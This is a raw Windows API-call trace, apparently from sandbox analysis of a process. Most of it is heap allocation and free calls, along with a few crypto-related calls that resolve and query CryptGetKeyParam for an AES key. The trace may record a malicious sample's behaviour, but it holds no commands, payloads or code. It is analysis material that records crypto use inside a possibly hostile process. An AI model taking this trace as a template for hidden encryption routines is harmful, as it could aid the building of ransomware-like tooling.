HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0107.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0107.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0107.630] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0107.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0107.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0107.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.631] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0107.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.632] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0107.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0107.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0107.632] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacb8 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0107.633] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0107.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0107.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0107.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0107.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0107.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0107.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0107.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0107.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0558 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0107.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0107.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0107.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0107.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0558 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0107.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0107.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0107.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0107.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0107.636] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0107.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0107.636] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2c40, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2c40*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0288 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0107.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.638] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, 